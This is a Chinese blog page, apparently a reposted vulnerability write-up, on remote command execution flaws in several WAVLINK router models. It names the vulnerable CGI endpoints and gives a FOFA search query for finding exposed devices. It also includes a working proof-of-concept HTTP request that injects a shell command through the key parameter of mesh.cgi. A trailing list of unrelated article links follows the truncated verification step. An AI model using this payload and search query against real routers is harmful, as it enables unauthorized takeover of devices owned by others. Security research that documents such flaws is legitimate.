当前位置: 首页 > news >正文

wavlink 路由器 多处前台RCE漏洞复现

news 2025/7/22 23:59:59

 0x01 产品简介

WAVLINK是中国睿因科技(WAVLINK)公司开发的一款路由器。

0x02 漏洞概述

WAVLINK路由器mesh.cgi、nightled.cgi、live-api.cgi等接口处存在命令执行漏洞,攻击者可通过该漏洞获取服务器权限。包含型号WN530HG4、WN531G3、WN572HG3、WN535G3、WN575A4等。

0x03 复现环境

FOFA:icon_hash="-1350437236"

0x04 漏洞复现

PoC-1

POST /cgi-bin/mesh.cgi?page=upgrade&key=';id>./2.txt;' HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 0

验证

GET /cgi-bin/2.t
http://www.lryc.cn/news/264402.html

相关文章:

  • 互联网中的商品超卖问题及其解决方案:Java中Redis结合UUID的应用
  • mysql:查看线程缓存中的线程数量
  • 线性表,也是Java中数组的知识点!
  • java使用面向对象实现图书管理系统
  • 2023 英特尔On技术创新大会直播 |我感受到的“芯”魅力
  • Atium Designer 23 全新功能-丝印制备,解决DFM问题
  • Nginx快速入门:安装目录结构详解及核心配置解读(二)
  • 测试TensorFlow/PyTorch的GPU版本是否启用
  • 字符串逆序输出
  • 期货平仓日历(期货平仓日期汇总)
  • 计算机网络-进阶
  • LED恒流驱动芯片SM2188EN:满足LED灯具出口欧盟所需的ERP能效认证标准和要求
  • RocketMQ系统性学习-RocketMQ原理分析之消费者的接收消息流程
  • butterfly蝴蝶分类
  • 计算机基础:网络基础
  • [原创][R语言]股票分析实战[3]:周级别涨幅趋势的相关性
  • MSVC编译 openssl windows 库
  • electron兼容统信UOS系统过程中的坑
  • Flink系列之:Apache Kafka SQL 连接器
  • 灰盒测试简要学习指南!
  • 【经典LeetCode算法题目专栏分类】【第7期】快慢指针与链表
  • springboot解决XSS存储型漏洞
  • I.MX6ULL_Linux_驱动篇(47)linux RTC驱动
  • 详解IBM企业架构框架模型CBM
  • 宝塔面板安装MySQL数据库并通过内网穿透工具实现公网远程访问
  • Elasticsearch 性能调优基础知识
  • 速盾网络:网络安全守护者
  • jmeter如何参数化?Jmeter参数化设置的5种方法
  • 01AVue入门(持续学习中)
  • js 深浅拷贝的区别和实现方法